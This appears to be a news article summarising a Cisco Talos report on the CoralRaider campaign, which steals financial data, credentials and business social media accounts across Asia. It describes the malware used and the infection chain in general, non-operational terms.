In a digital landscape fraught with cyber threats, a recent revelation by Cisco Talos has sounded the alarm on a formidable new adversary: CoralRaider. Since its emergence in May 2023, this insidious campaign orchestrated by Vietnamese hackers has been on a mission to plunder financial data, leaving a trail of victims across Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
CoralRaider operates with surgical precision, targeting users’ credentials, financial information, and social media accounts, particularly those utilized for business and advertising endeavors. To execute its nefarious objectives, the hackers have marshaled a sophisticated arsenal of malware, including RotBot (a mutated variant of the Quasar RAT trojan) and the notorious info-stealer XClient. Supplementing these tools are AsyncRAT, NetSupport RAT, and Rhadamanthys, forming a formidable array of cyber weaponry.
The crux of CoralRaider’s strategy lies in its exploitation of business and advertising accounts. Through mechanisms such as Ducktail and NodeStealer, cybercriminals seize control of these valuable assets, subsequently profiting from their illicit endeavors. Data harvested from victims’ systems are funneled through Telegram channels and swiftly peddled on the black market, fueling a lucrative underground economy.
The campaign’s modus operandi unfolds with the distribution of innocuous-looking LNK shortcuts, the precise delivery mechanism of which remains shrouded in mystery. Upon unwittingly triggering the LNK file, victims unwittingly unleash a cascade of malicious activity. An HTML application (HTA) is swiftly deployed from the attackers’ server, executing scripts designed to dismantle security protocols and facilitate the download of RotBot.
RotBot, acting as the vanguard of the assault, establishes communication with a Telegram bot, paving the way for the deployment of XClient. Operating stealthily in memory, XClient embarks on a systematic plundering of sensitive data. Screenshots are captured, cookie files are pilfered, and credentials are siphoned from various browsers, including Discord and Telegram.
Not content with mere browser-based spoils, XClient extends its reach to social media behemoths such as Facebook, Instagram, TikTok, and YouTube. Here, it meticulously extracts payment methods and permissions linked to business accounts on Facebook, further enhancing the cybercriminals’ illicit gains.
Attribution of the CoralRaider campaign to operators based in Vietnam is supported by compelling evidence, including linguistic cues within the malicious software code and communications within Telegram channels. Such indications underscore the global nature of cyber threats and the imperative of international cooperation in combating them.
As CoralRaider continues its relentless onslaught, organizations and individuals must fortify their defenses against this pernicious threat. Vigilance, robust cybersecurity measures, and proactive collaboration are essential in safeguarding financial data and preserving the integrity of digital ecosystems.
